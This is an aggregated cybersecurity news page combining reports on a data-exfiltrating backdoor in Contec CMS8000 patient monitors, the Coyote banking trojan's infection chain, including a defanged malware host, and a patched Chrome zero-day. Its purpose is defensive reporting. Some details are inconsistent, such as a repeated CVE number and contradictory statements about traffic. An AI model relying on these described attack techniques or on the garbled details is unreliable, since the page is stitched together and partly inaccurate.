Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions - Related to healthcare, china, zero-day, coyote, fifth

Backdoor found in two healthcare patient monitors, linked to IP in China

The US Cybersecurity and Infrastructure Security Agency (CISA) is warning that Contec CMS8000 devices, a widely used healthcare patient monitoring device, include a backdoor that quietly sends patient data to a remote IP address and downloads and executes files on the device.

Contec is a China-based organization that specializes in healthcare technology, offering a range of medical devices including patient monitoring systems, diagnostic equipment, and laboratory instruments.

CISA learned of the malicious behavior from an external researcher who disclosed the vulnerability to the agency. When CISA tested three Contec CMS8000 firmware packages, the researchers discovered anomalous network traffic to a hard-coded external IP address, which is not associated with the business but rather a university.

This led to the discovery of a backdoor in the business's firmware that would quietly download and execute files on the device, allowing for remote execution and the complete takeover of the patient monitors. It was also discovered that the device would quietly send patient data to the same hard-coded address when devices were started.

None of this activity was logged, causing the malicious activity to be conducted secretly without alerting administrators of the devices.

While CISA did not name the university and redacted the IP address, that it is associated with a Chinese university. The IP address is also hard-coded in software for other medical equipment, including a pregnancy patient monitor from another Chinese healthcare manufacturer.

An FDA advisory about the backdoor also confirmed that it was also found in Epsimed MN-120 patient monitors, which are re-labeled Contec CMS8000 devices.

On analyzing the firmware, CISA found that one of the device's executables, ' monitor ,' contains a backdoor that issues a series of Linux commands that enable the device's network adapter (eth0) and then attempts to mount a remote NFS share at the hard-coded IP address belonging to the university.

The NFS share is mounted at /mnt/ and the backdoor recursively copies the files from the /mnt/ folder to the /opt/bin folder.

The backdoor will continue to copy files from /opt/bin to the /opt folder and, when done, unmount the remote NFS share.

"Though the /opt/bin directory is not part of default Linux installations, it is nonetheless a common Linux directory structure," explains CISA's advisory.

"Generally, Linux stores third-party software installations in the /opt directory and thirdparty binaries in the /opt/bin directory. The ability to overwrite files within the /opt/bin directory provides a powerful primitive for remotely taking over the device and remotely altering the device configuration."

"Additionally, the use of symbolic links could provide a primitive to overwrite files anywhere on the device filesystem. When executed, this function offers a formidable primitive allowing for a third-party operating at the hard-coded IP address to potentially take full control of the device remotely."

While CISA has not shared what these files perform on the device, they expressed they detected no communication between devices and the hard-coded IP address, only the attempts to connect to it.

CISA says that after reviewing the firmware, they do not believe this is an automatic upgrade feature, but rather than a backdoor planted in the device's firmware.

"By reviewing the firmware code, the team determined that the functionality is very unlikely to be an alternative enhancement mechanism, exhibiting highly unusual characteristics that do not support the implementation of a traditional enhancement feature. For example, the function provides neither an integritychecking mechanism nor version tracking of updates. When the function is executed, files on the device are forcibly overwritten, preventing the end customer—such as a hospital—from maintaining awareness of what software is running on the device. These types of actions and the lack of critical log/auditing data go against generally accepted practices and ignore essential components for properly managed system updates, especially for medical devices." ❖ CISA ❖ CISA.

Further lending to this being a backdoor by design, CISA found that the devices also began sending patient data to the remote IP address when the devices started.

CISA says that patient data is typically transmitted across a network using the Health Level 7 (HL7) protocol. However, these devices sent the data to the remote IP over port 515, which is usually associated with the Line Printer Daemon (LPD) protocol.

The transmitted data includes the doctor's name, patient ID, patient's name, patient's date of birth, and other information.

Patient data sent to remote IP address in China.

After contacting Contec about the backdoor, CISA was sent multiple firmware images that were supposed to have mitigated the backdoor.

However, each one continued to contain the malicious code, with the enterprise simply disabling the 'eth0' network adapter to mitigate the backdoor. However, this mitigation does not help as the script specifically enables it using the ifconfig eth0 up command before mounting the remote NFS share or sending patient data.

Currently, there is no available patch for devices that removes the backdoor, and CISA recommends that all healthcare organizations disconnect these devices from the network if possible.

Furthermore, the cybersecurity agency recommends organizations check their Contec CMS8000 patient monitors for any signs of tampering, such as displaying information different from a patient's physical state.

BleepingComputer contacted Contec with questions about the firmware and will upgrade the story if we receive a response.

The job of a SOC analyst has never been easy. Faced with an overwhelming flood of daily alerts, analysts (and sometimes IT teams who are doubling as S......

Broadcom has released security updates to patch five security flaws impacting VMware Aria Operations and Aria Operations for Logs, warning consumers t......

Meta-owned WhatsApp on Friday stated it disrupted a campaign that involved the use of spyware to target journalists and civil society members.

Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions

Brazilian Windows people are the target of a campaign that delivers a banking malware known as Coyote.

"Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials," Fortinet FortiGuard Labs researcher Cara Lin mentioned in an analysis .

The cybersecurity firm revealed it discovered over the past month several Windows Shortcut (LNK) file artifacts that contain PowerShell commands responsible for delivering the malware.

Coyote was first documented by Kaspersky in early 2024, detailing its attacks targeting customers in the South American nation. It's capable of harvesting sensitive information from over 70 financial applications.

In the previous attack chain documented by the Russian cybersecurity firm, a Squirrel installer executable is used to trigger a [website] application compiled with Electron, that, for its part, runs a Nim-based loader to trigger the execution of the malicious Coyote payload.

The latest infection sequence, on the other hand, commences with an LNK file that executes a PowerShell command to retrieve the next-stage from a remote server ("tbet.geontrigame[.]com"), another PowerShell script that launches a loader responsible for executing an interim payload.

"The injected code leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads," Lin mentioned. "The decrypted MSIL execution file first establishes persistence by modifying the registry at 'HCKU\Software\Microsoft\Windows\CurrentVersion\Run.'"

"If found, it removes the existing entry and creates a new one with a randomly generated name. This new registry entry contains a customized PowerShell command pointing to download and execute a Base64-encoded URL, which facilitates the main functions of the Coyote banking trojan."

The malware, once launched, gathers basic system information and the list of installed antivirus products on the host, after which the data is Base64-encoded and exfiltrated to a remote server. It also performs various checks to evade detection by sandboxes and virtual environments.

A notable change in the latest iteration of Coyote is the expansion of its target list to encompass 1,030 sites and 73 financial agents, such as [website], [website], [website], [website], [website], and [website].

Should the victim attempt to access any one of the sites in the list, the malware contacts an attacker-controlled server to determine the next course of action, which can range from capturing a screenshot to serving overlays. Some of the other functions include displaying activating a keylogger and manipulating display settings.

"Coyote's infection process is complex and multi-staged," Lin expressed. "This attack leveraged an LNK file for initial access, which subsequently led to the discovery of other malicious files. This Trojan poses a significant threat to financial cybersecurity, particularly because it has the potential to expand beyond its initial targets."

[website] million people were affected, in a breach that could spell more trouble down the line.

A 7-Zip vulnerability allowing attackers to bypass the Mark of the Web (MotW) Windows security featu...

A 59-year-old man from Irvine, California, was sentenced to 87 months in prison for his involvement ...

Google Patches Chrome’s Fifth Zero-Day of the Year

An insufficient validation input flaw, one of 11 patched in an upgrade this week, could allow for arbitrary code execution and is under active attack.

Google has patched the fifth actively exploited zero-day vulnerability discovered in Chrome this year as one in a series of fixes included in a stable channel upgrade released Wednesday.

The bug, tracked as CVE-2022-2856 and rated as high on the Common Vulnerability Scoring System (CVSS), is associated with “insufficient validation of untrusted input in Intents,” .

Google credits Ashley Shen and Christian Resell of its Google Threat Analysis Group (TAG) for reporting the zero-day bug, which could allow for arbitrary code execution, on July 19. The advisory also unveiled 10 other patches for various other Chrome issues.

Intents are a deep linking feature on the Android device within the Chrome browser that replaced URI schemes, which previously handled this process, , a organization that offers various linking options for mobile applications.

“Instead of assigning window.location or an [website] to the URI scheme, in Chrome, developers need to use their intent string as defined in this document,” the business explained on its website. Intent “adds complexity” but “automatically handles the case of the mobile app not being installed” within links, .

Insufficient validation is associated with input validation, a frequently-used technique for checking potentially dangerous inputs to ensure that they are safe for processing within the code, or when communicating with other components, ’s Common Weakness Enumeration site.

“When software does not validate input properly, an attacker is able to craft the input in a form that is not expected by the rest of the application,” . “This will lead to parts of the system receiving unintended input, which may result in altered control flow, arbitrary control of a resource, or arbitrary code execution.”.

As is typical, Google did not disclose specific details of the bug until it is widely patched to avoid threat actors taking further advantage of it, a strategy that one security professional noted is a wise one.

“Publicizing details on an actively exploited zero-day vulnerability just as a patch becomes available could have dire consequences, because it takes time to roll out security updates to vulnerable systems and attackers are champing at the bit to exploit these types of flaws,” observed Satnam Narang, senior staff research engineer at cybersecurity firm Tenable, in an email to Threatpost.

Holding back info is also sound given that other Linux distributions and browsers, such as Microsoft Edge, also include code based on Google’s Chromium Project. These all could be affected if an exploit for a vulnerability is released, he noted.

“It is extremely valuable for defenders to have that buffer,” Narang added.

While the majority of the fixes in the enhancement are for vulnerabilities rated as high or medium risk, Google did patch a critical bug tracked as CVE-2022-2852, a use-after-free issue in FedCM . 8. FedCM—short for the Federated Credential Management API–provides a use-case-specific abstraction for federated identity flows on the web, .

The zero-day patch is the fifth Chrome bug under active attack that Google has patched so far this year.

In July, the organization fixed an actively exploited heap buffer overflow flaw tracked as CVE-2022-2294 in WebRTC, the engine that gives Chrome its real-time communications capability, while in May it was a separate buffer overflow flaw tracked as CVE-2022-2294 and under active attack that got slapped with a patch.

In April, Google patched CVE-2022-1364, a type confusion flaw affecting Chrome’s use of the V8 JavaScript engine on which attackers already had pounced. The previous month a separate type-confusion issue in V8 tracked as CVE-2022-1096 and under active attack also spurred a hasty patch.

February saw a fix for the first of this year’s Chrome zero-days, a use-after-free flaw in Chrome’s Animation component tracked as CVE-2022-0609 that already was under attack. Later it was revealed that North Korean hackers were exploiting the flaw weeks before it was discovered and patched.

Besieged by scammers seeking to phish user accounts over the telephone, Apple and Google frequently ...

As cloud security evolves in 2025 and beyond, organizations must adapt to both new and evolving real...

Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant ...